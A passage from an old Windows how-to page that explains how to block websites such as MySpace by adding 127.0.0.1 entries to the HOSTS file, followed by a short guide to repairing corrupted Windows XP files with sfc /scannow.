C:\WINDOWS\SYSTEM32\DRIVERS\ETC for windows Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Windows 2k
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.

(but before this, make its backup in some other drive)

The default Windows HOSTS looks like this:
______________________

# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a "#" symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
_____________________________

3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:

127.0.0.1 name of the URL you want to block

For example to block the MySpace.com homepage (highly recommended!), simply type:

127.0.0.1 myspace.com
127.0.0.1 www.myspace.com

Other parts of MySpace could be blocked in a similar way:

127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
etc etc etc...

You may need to add sites with both with and without the "www.". Test after blocking to make sure you got it right.

You can add as many sites as you wish to block in this fashion. I, myself, have over 12000 undesireable and dangerous sites in my personal HOSTS file!

4. Close Notepad and answer "Yes" when prompted.

5. Reboot your computer and attempt to access your now blocked website. You should see a Cannot find server or DNS Error saying: "The page cannot be displayed".

HOW TO FIX CORRUPTED FILES IN WINDOWS XP


Step 1
Place your Windows XP CD in CD/DVD drive, and verify that the computer recognizes it by waiting for the AutoLoad to appear, or opening "My Computer" and seeing it in your CD/DVD drive.

Step 2
Point and click your "Start" menu, and select "Run"
A box will appear that will prompt you for a command.

Step 3
In the box that appears, type in:
sfc /scannow
The fix will now load, and will hopefully fix all of the corrupted files on your Windows XP drive.

If that does not fix it, you may want to try loading a repair image, or there could potentially be damage to your hard drive that is not fixable on a software level.

You could also attempt a defragment of your hard drive, as fragmentations of files can sometimes produce errors.

Good Luck!